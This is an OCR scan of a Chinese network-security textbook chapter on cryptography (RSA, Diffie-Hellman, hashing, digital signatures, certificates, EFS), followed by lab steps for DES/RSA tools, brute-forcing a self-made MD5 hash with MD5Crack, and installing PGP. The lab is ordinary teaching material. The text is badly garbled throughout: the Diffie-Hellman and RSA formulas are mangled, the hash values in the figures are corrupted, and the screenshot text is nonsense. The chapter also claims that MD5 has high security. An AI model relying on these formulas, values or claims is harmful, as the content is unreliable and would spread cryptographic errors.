开 密 钥 (z,e) 算 出 d, 只 能 分 解 整数 的 因子 , 即 从 n 找 出 它 的 两 个 质 因数 p 和 4g ,但 大 数 分 
解 是 一 个 十 分 困难 的 问题 。RSA 的 安全 性 取决 于 模 分解 的 困难 性 ,但 数学 上 至 今 还 未 证 
明 分 解 模 就 是 攻击 RSA 的 最 佳 方法 。 尽 管 如 此 ,人 们 还 是 从 消息 破译 、 密 钥 空 间 选 择 等 角 
度 提出 了 针对 RSA 的 其 他 攻击 方法 ,如 迭代 攻击 法 .选择 明文 攻击 法 .公用 模 攻 击 、 低 加 密 
指数 攻击 、 定 时 攻击 法 等 ,但 其 攻击 成 功 的 概率 微乎其微 。 
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出 于 安全 考虑 ,建议 在 RSA 中 使 用 1024 位 的 ,对 于 重要 场合 应 该 使 用 2048 位 。 

3. Diffie-Hellman 算法 

1976 年 ,Diffie 和 Hellman 首次 提出 了 公开 密 钥 算法 的 概念 ,也 正 是 他 们 实现 了 第 一 个 
公开 密 钥 算 法 一 一 Diffie-Hellman 算法 。Diffie-Hellman 算法 的 安全 性 源 于 在 有 限 域 上 计 
算 离 散 对 数 比 计算 指数 更 为 困难 。 

Diffie-Hellman 算法 的 思路 是 : 首先 必须 公布 两 个 公开 的 整数 n 和 g,n 是 大 素数 ,g 是 
模 的 本 原 元 。 当 Alice 和 Bob 要 作 秘 密 通 信 时 , 则 执行 以 下 步骤 。 

(1) Alice 秘密 选取 一 个 大 的 随机 数 x(x 二 n), 计 算 久 ==g” mod n, 并 且 将 X 发 送 
给 Bob。 

(2) Bob 秘密 选取 一 个 大 的 随机 数 y(y 二 nn) ,计算 Y=g?” mod n, 并 且 将 Y 发 送 给 Alice。 

(3) Alice 计 算 k=Y* mod n。 

(4) Bob 计 算 k'==X? mod n。 

这 里 上 和 k' 都 等 于 g” mod n, 因 此 就 是 Alice 和 Bob 独立 计算 的 秘密 密 钥 。 

从 上 面 的 分 析 可 以 看 出 ,Diffie-Hellman 算法 仅 限于 密 钥 交换 的 用 途 ,而 不 能 用 于 加 密 
或 解密 ,因此 该 算法 通常 称 为 Diffie-Hellman 密 钥 交 换 。 这 种 密 钥 交换 的 目的 在 于 使 两 个 
用 户 安全 地 交换 一 个 秘密 密 钥 以 便于 以 后 的 报 文 加 密 。 

其 他 的 常用 公开 密 钥 算法 还 有 DSA 算法 (数字 签名 算法 )、ElGamal 算法 等 。 

非 对 称 加 密 和 对 称 加 密 各 有 特点 ,适用 于 不 同 的 场合 ,两 者 的 对 比如 表 5-2 所 示 。 


表 5-2 对称 加 密 和 非 对 称 加 密 的 比较 


























特 性 对 称 加 密 非 对 称 加 密 
密 钥 的 数量 单一 密 钥 密 钥 是 成 对 的 
密 钥 种 类 密 钥 是 秘密 的 一 个 公开 ,一 个 私有 
密 钥 管理 不 好 管理 需要 数字 证 书 及 可 靠 第 三 者 
加 解密 速度 非常 快 慢 
用 途 大 量 信息 的 加 密 少量 信息 的 加 密 、 数 字 签名 等 


5.3.5 单 向 散 列 算法 


使 用 公 钥 加 密 算法 对 信息 进行 加 密 是 非常 耗 时 的 ,因此 加 密 人 员 想 出 了 一 种 办 法 来 快 
速生 成 一 个 能 代表 发 送 者 消息 的 简短 而 独特 的 消息 摘要 ,这 个 摘要 可 以 被 加 密 并 作为 发 送 
者 的 数字 签名 。 

通常 ,产生 消息 摘要 的 快速 加 密 算 法 称 为 单 向 散 列 函数 (Hash 函数 )。 单 向 散 列 函数 
不 使 用 密 钥 , 它 只 是 一 个 简单 的 函数 ,把 任何 长 度 的 一 个 消息 转化 为 一 个 叫 作 消息 摘要 的 简 
单 的 字符 串 。 

消息 摘要 的 主要 特点 如 下 。 

(1) 无 论 输入 的 消息 有 多 长 ,计算 出 来 的 消息 摘要 的 长 度 总 是 固定 的 。 例 如 应 用 MD5 
算法 产生 的 消息 摘要 有 128 比特 位 ,用 SHA/SHA-1 算法 产生 的 消息 摘要 有 160 比特 位 ， 
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SHA/SHA-1 算法 的 变 体 可 以 产生 256、384 和 512 比特 位 的 消息 摘要 。 一 般 认为 ,摘要 的 
最 终 输 出 越 长 ,该 摘 要 算法 就 越 安 全 。 

(2) 消息 摘要 看 起 来 是 “随机 的 ”"。 这 些 比 特 看 上 去 是 胡乱 地 杂凑 在 一 起 的 。 可 以 用 大 
量 的 输入 来 检验 其 输出 是 否 相同 ,一 般 情况 下 ,不 同 的 输入 会 有 不 同 的 输出 。 但 是 ,一 个 消 
息 摘要 并 不 是 真正 随机 的 ,因为 用 相同 的 算法 对 相同 的 消息 求 两 次 摘要 ,其 结果 必然 相同 ; 
而 若是 真正 随机 的 , 则 无 论 如 何 都 是 无 法 重 现 的 。 因 此 消息 摘要 是 “ 伪 随 机 的 ”。 

(3) 一 般 地 ,只 要 输入 的 消息 不 同 ,对 其 进行 摘要 以 后 产生 的 摘要 消息 也 必然 不 相同 ; 
但 相同 的 输入 必然 会 产生 相同 的 输出 。 这 正 是 好 的 消息 摘要 的 算法 所 具有 的 性 质 : 输入 改 
变 了 ,输出 也 就 改变 了 ;两 条 相似 的 消息 的 摘要 的 确 不 相近 ,甚至 会 大 相 径 庭 。 

(4) 消息 摘要 函数 是 单 向 函数 , 即 只 能 进行 正 向 的 消息 摘要 ,而 无 法 从 摘要 中 恢复 出 任 
何 的 消息 ,甚至 根本 就 找 不 到 任何 与 原 信息 相关 的 信息 。 

因此 ,消息 摘要 可 以 用 于 完整 性 校 验 ,验证 消息 是 否 被 修改 或 伪造 。 























5.3.6 数字 签名 技术 


随 着 计算 机 网 络 的 发 展 , 电 子 商 务 . 电 子 政务 .电子 金融 等 系统 得 到 了 广泛 应 用 ,在 网 络 
传输 过 程 中 ,通信 双方 可 能 存在 一 些 问题 。 信 息 接 收 方 可 以 伪造 一 份 消息 ,并 声称 是 由 发 送 
方 发 送 过 来 的 ,从 而 获得 非法 利益 ;同样 ,信息 的 发 送 方 也 可 以 否认 发 送 过 来 的 消息 ,从 而 获 
得 非法 利益 。 因 此 ,在 电子 商务 中 , 某 一 个 用 户 在 下 订单 时 ,必须 要 能 够 确认 该 订单 确实 为 
用 户 自 己 发 出 ,而 非 他 人 伪造 ;另外 ,在 用 户 与 商家 发 生 争执 时 ,也 必须 存在 一 种 手段 ,能 够 
为 双方 关于 订单 进行 仲裁 。 这 就 需要 一 种 新 的 安全 技术 来 解决 通信 过 程 中 引起 的 争端 ,由 
此 出 现 了 对 签名 电子 化 的 需求 , 即 数字 签名 技术 (digital signature) 。 

使 用 密码 技术 的 数字 签名 正 是 一 种 作用 类 似 于 传统 的 手写 签名 或 印章 的 电子 标记 , 因 
此 使 用 数字 签名 能 够 解决 通信 双方 由 于 否认 、 伪 造 、 冒 充 和 算 改 等 引发 的 争端 。 数 字 签 名 的 
目的 就 是 认证 网 络 通信 双方 身份 的 真实 性 ,防止 相互 欺骗 或 抵赖 。 数 字 签 名 是 信息 安全 的 
又 一 重要 研究 领域 ,是 实现 安全 电子 交易 的 核心 之 一 。 

1. 数字 签名 的 基本 原理 

鉴别 文件 或 书信 真 伪 的 传统 做 法 是 亲笔 签名 或 盖 章 。 签 名 起 到 认证 、 核 准 . 生 效 的 作 
用 。 电 子 商 务 .电子 政务 等 应 用 要 求 对 电子 文档 进行 辨认 和 验证 ,因而 产生 了 数字 签名 。 数 
字 签 名 既 可 以 保证 信息 完整 性 ,同时 提供 信息 发 送 者 的 身份 认证 。 发 送 者 对 所 发 信息 不 能 
抵赖 。 

在 发 送 方 ,将 消息 按 双方 约定 的 单 向 散 列 算法 计算 得 到 一 个 固定 位 数 的 消息 摘要 ,在 数 
学 上 保证 : 只 要 改动 消息 的 任何 一 位 ,重新 计算 出 来 的 消息 摘要 就 会 与 原先 不 同 , 这 样 就 保 
证 了 消息 的 不 可 更 改 。 然 后 把 该 消息 摘要 用 发 送 者 的 私 钥 进行 加 密 , 得 到 的 密 文 (加 密 的 消 
息 摘 要 ) 即 为 数字 签名 ,最 后 将 原 消 息 和 数字 签名 一 起 发 送 给 接收 者 。 

接收 方 收 到 消息 和 数字 签名 后 ,用 同样 的 单 向 散 列 算法 对 消息 计算 消息 摘要 ,然后 与 用 
发 送 者 的 公 钥 对 数字 签名 进行 解密 得 到 的 消息 摘要 相 比较 , 如 果 两 者 相同 , 则 说 明 消息 确实 
来 自发 送 者 ,并 且 消 息 是 真实 的 ,因为 使 用 发 送 者 的 私 钥 加 密 的 信息 只 有 使 用 发 送 者 的 公 和 钥 
才能 进行 解密 ,从 而 保证 了 消息 的 真实 性 和 发 送 者 的 身份 。 
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2. 举例 说 明 

















































































































上 1 1 1 
1 | 
| | 加 密 的 摘要 | | | 加 密 的 摘要 |， | ! 
| 1 1 1 
| | 散 列 函数 I 消息 摘要 | | 
| 全 1 
1 1 1 1 ! 
| [消息 摘要 | 1 比较 | 
| | 1 1 ! 
| 1 | | ! 1 
| [加 密 算法 | “| 加密 的 摘要 | | | | 解密 算法 | 解密 的 摘要 | 1 
| ': 1 | | 
| | A 的 私 钥 | | A 的 公 铀 | 
上 1 1 1 
[Ds 人 ! 
Alice 进 行 签名 Bob 验 证 签名 


图 5-13 利用 公开 密 钥 密码 技术 的 数字 签名 


(1) Alice 使 用 单 向 散 列 函数 对 要 传送 的 消息 (明文 ) 计 算 消 息 摘要 。 

(2) Alice 使 用 自己 的 私 钥 对 消息 摘要 进行 加 密 , 得 到 加 密 的 消息 摘要 (数字 签名 ) 。 

(3) Alice 将 消息 (明文 ) 和 加 密 的 消息 摘要 (数字 签名 ) 一 起 发 送 给 Bob。 

(4) Bob 收 到 “消息 十 加 密 的 摘要 ”后 ,使 用 相同 的 单 向 散 列 函数 对 消息 (明文 ) 计 算 消 

(5) Bob 使 用 Alice 的 公 钥 对 收 到 的 加 密 的 消息 摘要 (数字 签名 ) 进 行 解密 ,得 到 消息 
摘要 。 

(6) Bob 将 自己 计算 得 到 的 消息 摘要 与 解密 得 到 的 消息 摘要 进行 比较 ,如 果 相 同 , 说 明 
签名 是 有 效 的 。 和 否则 说 明 消 息 不 是 Alice 发 送 的 ,或 者 消息 有 可 能 被 自 改 。 

在 图 5-13 中 ,Bob 接收 到 的 消息 是 未 加 密 的 ,如 果 消 息 本 身 需要 保密 ,Alice 发 送 前 可 
用 Bob 的 公 钥 对 “消息 十 加 密 的 摘要 ”进行 加 密 ,Bob 接收 后 , 先 用 自己 的 私 钥 进行 解密 , 然 
后 再 验证 数字 签名 。 

由 此 可 见 ,数字 签名 可 以 保证 以 下 几 点 。 

(1) 可 验证 : 数字 签名 是 可 以 被 验证 的 。 

(2) 防 抵赖 : 防止 发 送 者 事后 不 承认 发 送 消息 并 签名 。 

(3) 防 假冒 : 防止 攻击 者 冒充 发 送 者 向 接收 方 发 送 消 息 。 

(4) 防 算 改 : 防止 攻击 者 或 接收 方 对 收 到 的 信息 进行 自 改 。 

(5) 防伪 造 : 防止 攻击 者 或 接收 方 伪造 对 消息 的 签名 。 


5.3.7 数字 证 书 
数字 证 书 (digital certificate) 又 称 数字 标识 (digital ID) ,是 用 来 标志 和 证 明 网 络 通信 双 


方 身份 的 数字 信息 文件 。 数 字 证 书 一 般 由 权威 ,公正 的 第 三 方 机 构 即 CA certificate 
152 


项 目 5 密码 技术 
authority ,数字 证 书 认证 中 心 ) 签 发 ,包括 一 串 含 有 客户 基本 信息 及 CA 签名 的 数字 编码 。 
在 网 上 进行 电子 商务 活动 时 ,交易 双方 需要 使 用 数字 证 书 来 表明 自己 的 身份 ,并 使 用 数字 证 
书 来 进行 有 关 的 交易 操作 。 通 俗 地 讲 ,数字 证 书 就 是 个 人 或 单位 在 因特网 的 身份 证 。 

数字 证 书 主要 包括 三 方面 的 内 容 : 证 书 所 有 者 的 信息 、 证 书 所 有 者 的 公开 密 钥 和 证 书 
颁发 机 构 的 签名 。 

一 个 标准 的 X. 509 数字 证 书包 含 (但 不 限于 ) 以 下 内 容 : 

(1) 证 书 的 版 本 信息 ; 

(2) 证 书 的 序列 号 ,每 个 证 书 都 有 一 个 唯一 的 证 书 序列 号 ; 

(3) 证 书 所 使 用 的 签名 算法 ; 

(4) 证 书 的 发 行 机 构 名 称 (命名 规则 一 般 采 用 X. 500 格式 ) 及 其 私 钥 的 签名 ; 

(5) 证 书 的 有 效 期 ; 

(6) 证 书 使 用 者 的 名 称 及 其 公 钥 的 信息 。 





5.3.8 EFS 加 密 文件 系统 


EFS(encrypting file system, 加 密 文件 系统 ) 是 Windows 系统 中 的 一 项 功能 ,针对 
NTFS 分 区 中 的 文件 和 数据 ,用 户 都 可 以 直接 加 密 , 从 而 达到 快速 提高 数据 安全 性 的 目的 。 

EFS 加 密 基 于 公 钥 策略 。 在 使 用 EFS 加 密 一 个 文件 或 文件 夹 时 ,系统 首先 会 生成 一 个 
由 伪 随 机 数组 成 的 FEK(file encryption key, 文 件 加 密 钥 匙 ) ,然后 将 利用 FEK 和 数据 扩展 
标准 X 算 法 创建 加 密 后 的 文件 ,并 进行 存储 ,同时 删除 原始 文件 。 然 后 系统 会 利用 公 钥 加 
密 FEK, 并 把 加 密 后 的 FEK 存储 在 同一 个 加 密 文件 中 。 而 在 访问 被 加 密 的 文件 时 ,系统 首 
先 利 用 当前 用 户 的 私 钥 解密 FEK .然后 利用 FEK 解密 出 文件 。 在 首次 使 用 EFS 时 ,如 果 用 
户 还 没有 公 钥 / 私 钥 对 (统称 为 密 钥 ), 则 会 首先 生成 密 钥 ,然后 加 密 数 据 。 如 果 用 户 登 录 到 
了 域 环 境 中 , 则 密 钥 的 生成 依赖 于 域 控制 器 ,否则 依赖 于 本 地 机 器 。 

由 于 重 装 系统 后 ,SID( 安 全 标识 符 ) 的 改变 会 使 原来 由 EFS 加 密 的 文件 无 法 打开 ,所 以 为 
了 保证 别人 能 共享 EFS 加 密 文件 或 者 重 装 系统 后 可 以 打开 EFS 加 密 文件 ,必须 要 备份 证 书 。 

EFS 加 密 文件 系统 对 用 户 是 透明 的 。 也 就 是 说 ,如 果 用 户 加 密 了 一 些 数 据 ,那么 用 户 
对 这 些 数据 的 访问 将 是 完全 允许 的 ,并 不 会 受到 任何 限制 。 而 其 他 非 授 权 用 户 试图 访问 加 
密 过 的 数据 时 ,就 会 收 到 “访问 拒绝 ”的 错误 提示 。EFS 加 密 的 用 户 验证 过 程 是 在 登录 
Windows 时 进行 的 ,只 要 登录 到 Windows, 就 可 以 打开 任何 一 个 被 授权 的 加 密 文 件 。 

使 用 EFS 加 密 文件 或 文件 夹 时 ,要 注意 以 下 几 个 方面 。 

(1) 只 有 NTFS 格式 的 分 区 才 可 以 使 用 EFS 加 密 技术 。 

(2) 第 一 次 使 用 EFS 加 密 后 应 及 时 备份 密 钥 。 

(3) 如 果 将 未 加 密 的 文件 复制 到 具有 加 密 属 性 的 文件 夹 中 ,这 些 文件 将 会 被 自动 加 密 。 
若是 将 加 密 数据 移出 来 则 有 两 种 情况 : 若 移动 到 NTFS 分 区 上 ,数据 依旧 保持 加 密 属性 ; 若 
移动 到 FAT32 分 区 上 ,这 些 数据 将 会 被 自动 解密 。 

(4) 被 EFS 加 密 过 的 数据 不 能 在 Windows 中 直接 共享 。 

(5) NTFS 分 区 中 加 密 和 压缩 功能 不 能 同时 使 用 。 

(6) Windows 系统 文件 和 文件 夹 无 法 被 加 密 。 
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54 项 目 实 施 


5.4.1 任务 1: DES、RSA 和 Hash 算法 的 实现 


1. 任务 目标 

(1) 掌握 常用 加 密 处 理 软件 的 使 用 方法 。 

(2) 理解 DES、RSA 和 Hash 算法 的 原理 。 

(3) 了 解 MD5 算法 的 破解 方法 。 

2. 任务 内 容 

(1) 对 称 加 密 算法 DES 的 实现 。 

(2) 非 对 称 加 密 算法 RSA 的 实现 。 

(3) Hash 算法 的 实现 与 MD5 算法 的 破解 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7/2008 操作 系统 的 计算 机 1 台 。 

(2) MixedCS、RSATool,DAMN_HashCalc.MD5Crack 工具 软件 各 1 套 。 
4. 任务 实施 步骤 

1) 对 称 加 密 算法 DES 的 实现 

DES 算法 属于 对 称 加 密 算 法 , 即 加 密 和 解密 使 用 同一 个 密 钥 。DES 算法 有 一 个 致命 的 


缺陷 就 是 密 钥 长 度 短 , 只 有 56 位 ,对 于 当今 飞速 发 展 的 计算 机 技术 ,已 经 抵抗 不 住 穷 举 破 
解 ,一 个 改进 的 算法 就 是 三 重 DES 算法 (3DES) ,可 使 密 钥 长 度 扩展 到 112 位 或 168 位 。 
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步骤 1: 双击 运行 MixedCS. exe 程序 ,打开 的 程序 主 界面 如 图 5-14 所 示 。 
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步骤 2: 单 击 “浏览 文件 ”按钮 ,选择 要 进行 DES 加 密 的 源 文件 ,如 *D:\1.jpg” 文 件 , 选 
中 “DES 加 密 ? 单 选 按钮 ,在 “输出 文件 ”文本 框 中 会 自动 出 现 默 
认 的 加 密 后 的 文件 名 ,如 “D:\1. jpg. des”。 

步骤 3: 在 “DES 密 钥 " 文 本 框 中 输入 5 个 字符 (区 分 大 小 
写 ) 作 为 密 钥 ,在 “确认 密 钥 ”文本 框 中 重新 输入 相同 的 5 个 
字符 。 

步骤 4: 单 击 “加 密 ? 按 钮 ,弹出 * 真 的 要 进行 该 操作 吗 ?” 的 
提示 信息 , 单 击 “是 ”按钮 , 稍 候 出 现 *“ 加 密 成 功 ! 用 时 4 秒 ” 的 图 5-15 ”提示 信息 
提示 信息 ,如 图 5-15 所 示 。 

步骤 5: 将 密 钥 长 度 改 为 10 个 字符 ,重新 进行 加 密 , 此 时 软件 将 自动 采用 3DES 算法 进 
行 加 密 , 可 以 看 出 加 密 的 时 间 明 显 增加 了 ,如 图 5-16 所 示 。 


Ve a ] 
「 簿 入 /输出 - 


输入 文件 刁 :\i. jpe 浏览 文件 
输出 文件 [VI Jpe des 选择 目录 
厂 使 用 对 路 径 下 文人 


慎 认 路 径 制 览 目 又 





























了 5 一 


Rs4 富 钼 f0) 导 久 
RS (0) 导入 


























DES 密 钥 
确认 密 外 
| 
| 
中 | 基本 人 | C 混和 0 理 6 DE 加密 
| | 厂 加 密 后 除 原 文件 








厂 前 密 后 删除 加 密 文 件 “ 尽 删除 前 提示 


产生 RsA 密 钥 对 | 关于 退出 







































































图 5-16 用 3DES 算 法 进行 加 密 


步骤 6: 单 击 “ 浏 览 文件 ”按钮 ,选择 已 加 密 文件 “D:\1. jpg. des”, 并 把 “输出 文件 ”修改 
为 "D:\2.jpg”, 保持 原 10 个 字符 的 密 钥 不 变 , 单 击 “ 解 密 ” 按 钮 进行 解密 ,如 图 5-17 所 示 ， 
验证 1.jpg 和 2.jpg 文件 内 容 是 否 一 致 。 

2) 非 对 称 加 密 算 法 RSA 的 实现 

(1) 回顾 RSA 的 实现 原理 

@ 选择 两 个 大 素数 p 和 g。 

加 计算 n=pXg 和 z=(p 一 1)X(g 一 1)。 
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0 和 

















区 入 /回击 
输入 文件 由 :I. jpe des 浏览 文件 
葵 出 文件 局 :V2 jpe 选择 目录 
厂 使 用 点 认 路 径 打开 文件 
上 贱 认 骂 径 | 训 师 目录 











个 融和 加 到 
厂 加 密 后 删除 原文 件 
厂 前 密 后 本 除 加密 文 件 “ 鲁 除 前 提示 

















有 |] 六 和 SA 审视 对 | WF | an | 









































图 5-17 用 3DES 算 法 进行 解密 


@ 选择 一 个 与 > 互 素 (没有 公 因 子 ) 的 数 d。 

@ 找到 。, 使 其 满足 (dXe) mod z=1。 

@@ 公 钥 为 (e,n) ,而 私 钥 为 (d,n)。 

(2) 实例 说 明 

Q@ 选择 两 个 大 素数 p 二 17 和 gq 二 47。 

@ 计算 n=17X47=799, 计 算 <z=(17 一 1)X(47 一 1)=736。 

@ 选择 一 个 与 x 互 素 的 数 d 二 589。 

@ 找到 e=5 ,满足 CdXe) mod = 一 1。 

@ 公 钥 为 (5,799) ,而 私 钥 为 (589,799) 。 

(3) 非 对 称 加 密 算法 RSA 的 实现 

步骤 1: 双击 运行 RSATool2v17. exe 程序 ,打开 的 程序 主 界面 如 图 5-18 所 示 。 

步骤 2: 在 Number Base 下 拉 框 中 选择 10 选项 .作为 数 制 , 在 Public Exponent 文本 框 
中 输入 数字 5, 在 1st Prime 文本 框 中 输入 数字 17 ,在 2nd Prime 文本 框 中 输入 数字 47。 

步骤 3: 单 击 *Calce. D” 按 钮 , 则 计算 出 n( 二 799) 和 4d( 二 589)。 

步骤 4: 在 Number Base 下 拉 列 表 框 中 选择 选项 10, 在 Public Exponent 文本 框 中 输入 
数字 10001, 再 单 击 窗口 左上 角 的 Start 按钮 ,系统 自动 产生 随机 数 ,再 单 击 窗口 左下 角 的 
Generate 按钮 , 则 会 产生 出 两 个 大 素数 p 和 g 以 及 n 和 d ,如 图 5-19 所 示 。 

步骤 5: 单 击 窗口 左下 角 的 Test 按钮 ,打开 RSA-Test 对 话 框 ,可 进行 加 解密 测试 。 
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面世 本 | Factoring info (Prime factors): 


Factor N 


[Ce] 
厂 Use MpQS method only 厂 No time checks 
Ready To create RSA Keys, press >Start< now to generate some random data... 











图 5-18 RSA 密 钥 的 计算 


人 RsA-Tool 2 by tE! 




















226606658995392223675014338962313082419 


2nd Prime (0) 
250924273198298390766369977053780348451 


























Modulus (N) [R Exact size, 
56861111210313439891236196696501777893406333124501089182062757692449701982969 











Private Exponent (D) 
47450053742039489565462373835464428230835653018864025324064466026170774550473 








| Factoring info (Prime factors): 


Fe 




















= | 厂 use MPQS method only 厂 No time checks 
pone. You can test your keys right now. 

















5-19 ”自动 产生 RSA 密 钥 


步骤 6: 在 Message to encrypt 文本 框 中 输入 一 个 数 ,如 256, 然 后 单 击 Encrypt 按钮 ， 


进行 加 密 , 密 文 显示 在 Ciphertext 文本 框 中 ,如 图 5-20 所 示 。 
157 


网 络 安全 技术 项 目 化 教程 第 2 版 ) 











Max. length (chars) of message can be (Keysize/8)-1, to make sure that M < N. 





‘Ciphertext (C)- 
| 853639129845269782288168965984390477979315645652056120842181 < 
7299036403893657 























Message encrypted: C=M“E MOD N. You may press Decrypt now- 


图 5-20 RSA 加 密 测试 


步骤 7: 单 击 Decrypt 按钮 ,进行 解密 ,解密 后 的 明文 (256) 显 示 在 Ciphertext 文本 框 
中 ,如 图 5-21 所 示 。 可 见 , 加 密 前 的 原文 (256) 和 人 解密 后 的 明文 (256) 是 一 致 的 。 





Message (M) to encrypt: 
se 





Max. length (chars) of message can be (Keysize/8)-1, to make sure that M < N. 


























图 5-21 RSA 解密 测试 


3) Hash 算法 的 实现 与 MD5 算法 的 破解 

Hash 函数 ( 单 向 散 列 函数 ?的 计算 过 程 : 输入 一 个 任意 长 度 的 字符 串 , 返 回 一 串 固 定 长 
度 的 字符 串 (消息 摘要 )。 消 息 摘 要 常用 于 数字 签名 .身份 验证 、 验 证 数据 完整 性 等 。 

步骤 1: 双击 运行 DAMN_HashCalc. exe 程序 ,打开 程序 主 界面 。 

步骤 2: 选中 160 和 MD5 复 选 框 ,取消 选中 其 他 复 选 框 ,选中 Text 单 选 按 钮 ,并 在 其 后 
的 文本 框 中 输入 字符 串 123456789 ,然后 按 Enter 键 ,运算 结果 如 图 5-22 所 示 。 
































Crilel 





Calculating hash of 9 bytes string 123456789 ... 


SHA-160 17 FTC3BC1DS08E04732ADF67998SCCC34CATAE344 
3 25F9E794323B453835F5181F1B624DOB 


Caleulation took 0.000 seconds 





WS Stay on to Calculate 








图 5-22 字符 串 123456789 的 运算 结果 
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步骤 3: 将 文本 框 中 的 字符 串 改 为 1234567890, 然 后 按 Enter 键 ,运算 结果 如 图 5-23 所 
示 。 请 比较 这 两 幅 图 中 计算 结果 的 异同 点 。 











T1285 160T 192 T 224 TT 256 
of 
reereers 


Text [1234567890 


Cile 
































Calculating hash of 10 bytes string “1234567890 


SHA-160 01B307ACBA4P54FSSAAPC33BBO6BBBF6CA803ESX 
MDS EBOTFIFCF82D132F9BBO18CABT30A19F 


Calculation took 0.000 seconds 








WS Stay on to Calculate 








图 5-23 字符 串 1234567890 的 运算 结果 


步骤 4: 运行 MD5 的 破解 软件 MD5Crack ,并 将 字符 串 123456789 的 MD5 值 复制 到 破 
解 软 件 MD5Crack 窗口 中 的 “破解 单个 密 文 " 文 本 框 中 ,设置 字符 集 为 “数字 ”, 单 击 “ 开 始 ” 
按钮 进行 破解 ,如 图 5-24 所 示 。 
































使 MDscodspvi0-htpymwadnrcm 有 SI 
密 文 设置 
EE 




































































5-24 使 用 MD5Crack 破解 MD5 明文 


由 于 原来 的 MD5 明文 都 是 数字 并 且 比 较 简 单 , 破 解 将 很 快 完成 。 如 果 MD5 明文 既 有 
数字 又 有 字母 ,破解 将 花费 相当 长 的 时 间 , 这 进一步 说 明了 MD5 算法 有 较 高 的 安全 性 。 
步骤 5: DAMN_HashCalc. exe 程序 还 能 对 文件 进行 Hash 运算 ,请 读者 自行 练习 。 
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5.4.2 任务 2: PGP 软件 的 使 用 


1. 任务 目标 

(1) 掌握 PGP 软件 的 使 用 方法 。 

(2) 掌握 用 PGP 软件 进行 文件 或 邮件 的 加 密 和 签名 。 

(3) 理解 数字 签名 的 原理 。 

2. 任务 内 容 

(1) PGP 软件 的 安装 。 

(2) PGP 软件 的 配置 。 

(3) 密 钥 的 导出 与 导入 。 

(4) PGP 文件 的 加 密 和 解密 。 

(5) 电子 邮件 的 加 密 、 解 密 和 签名 验证 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7/2008 操作 系统 的 计算 机 2 台 。 

(2) PGP 软件 1 套 。 

4. 任务 实施 步骤 

PGP 软件 的 版 本 种 类 有 很 多 ,下 面 以 PGP Desktop 10. 1. 1 版 本 为 例 ,介绍 PGP 软件 
的 使 用 方法 。 

1) PGP 软件 的 安装 

步骤 1: 双击 运行 PGP 安装 程序 PGP1011CHS32. exe, 打 开 安装 界面 ,如 图 5-25 所 示 。 

步骤 2: 单 击 “ 简 体 中文 ” 按 钮 ,在 打开 的 “许可 协议 ”界面 中 ,选中 “我 接受 该 许可 协议 ” 
单 选 按钮 ,如 图 5-26 所 示 。 





用 同 计 以 下 法 律 协议 (协议 ) 的 PGP 。 软件 有 关 要 下 载 或 安装 ， 包 括 任何 更 新 和 
级 《每 个 定义 如 下 ) 根据 本 协议 《软件 ) 和 随 附 的 文档 《文件 ) 提供 给 您 的 许 
可 证 。“PGP 公司 “ 指 PGP 公司 。“ 您 “ 指 个 人 安装 或 使 用 本 软件 ， 他 或 她 自己 的 代表 } 
hsB4DQa 寻 本 如。 各 过 六 "人" 杞 可 


8hn 轿 炉 什 械 方 下 趟 “ 动 示 十 半 站 二 协 件 目下 工 




















图 5-25 ”选择 “简体 中 文 ”语言 图 5-26 “许可 协议 ”界面 


步骤 3: 单 击 “下 一 步 ” 按 钮 .在 打开 的 “显示 发 行 说 明 ” 界 面 中 选中 “不 显示 发 行 说 明 ” 单 
选 按钮 ,如 图 5-27 所 示 。 
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显示 发 行 说 明 


发 行 说 明 提供 了 重要 信息 。 


您 可 以 选择 显示 发 行 说 明 ， 二 二 竺 
经 安装 下 面 的 选项 。 如 果 您 想 今后 次 看 发 ; 
可 访 aPGP Destop 的 去 有 件 芝 中 间 














图 5-27 “显示 发 行 说 明 "界面 


步骤 4: 单 击 * 下 一 步 ?按钮 ,安装 程序 安装 完成 后 ,询问 是 否 要 重新 启动 计算 机 ,如 图 5-28 
所 示 , 单 击 * 是 ”按钮 重新 启动 计算 机 。 

2) PGP 软件 的 配置 gp 

步 又 1: 重新 启动 计算 机 后 ,会 自动 打开 这， 生 和 a 
“PGP 设置 助手 "向导, 如 图 5-29 所 示 。 

步骤 2: 选中 “是 ” 单 选 按 钮 ,表示 允许 当 








前 Windows 系统 账户 启用 PGP 软件 。 然 后 Ey 
单 击 “ 下 一 步 ” 按 钮 ,进入 “启用 许可 的 功能 ” 


界面 ,如 图 5-30 所 示 。 图 5-28 重新 启动 计算 机 





启用 Pep 


We 便 没 必要 完成 了 置 向 导 。 如 果 您 以 后 欢 变 主意 , 只 
天 运行 PGP . 


您 要 从 此 账户 启用 PGP 以 让 其 可 用 人 


回 是 m 
) 否 (o) 








ES 
图 5-29 “PGP 设置 助手 ”向 导 
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许可 助手 : 启用 许可 的 功能 


此 许可 证 号 能 使 PP 功能 开启 并 被 关联 到 这 里 辆 入 的 和 名字， 组 织 和 邮件 地 址 。 
如 果 您 先前 已 经 用 过 您 93WF 引 JWE， 保 证 辆 入 信息 和 先前 的 一 样 。 


和 名称; bin 
组 织 (0): ty 
邮件 地 址 昌 ): huanglevipa2len co 
确认 邮件 地 址 (C): haanglgvip&21cn com 


’。 了 ] [部 盈 ] 











图 5-30 “启用 许可 的 功能 ”界面 


步骤 3: 在 图 5-30 所 示 的 界面 中 输入 用 户 的 名 称 、 所 属 的 组 织 和 电子 邮件 地 址 ,然后 单 
击 “ 下 一 步 ” 按 钮 ,进入 “输入 许可 证 ”界面 ,如 图 5-31 所 示 , 选 中 “输入 您 的 许可 证 号 码 ” 单 选 
按钮 ,并 在 下 面 的 文本 框 中 输入 PGP 许可 证 号 码 。 



































许可 助手 : 输入 许可 证 
Enter the hcense number received for your purchase or upgrade below. If you do 
dsabled. 


nothave a beenoe rumber, You may Use the rodudt mil Most features 
You may also select this option to enter a cense number at a later tme. 


加 输入 您 的 许可 证 号 码 


pureE PR] -UG .489 .IROGH PWA 
不 使 用 许可 证 并 禁用 多 数 功 能 
[上 = 步 o]E= 步 m 习 [ -] CW] 














图 5-31 “输入 许可 证 ”界面 


步骤 4: 一 步 ” 按 钮 ,进入 “授权 成 功 ” 界 面 .如 图 5-32 所 示 。 

步骤 5: 单 击 “ 下 一 步 ” 按 钮 ,进入 “用 户 类 型 "界面 .如 图 5-33 所 示 , 选 中 “我 是 一 个 新 用 
户 ” 单 选 按钮 。 

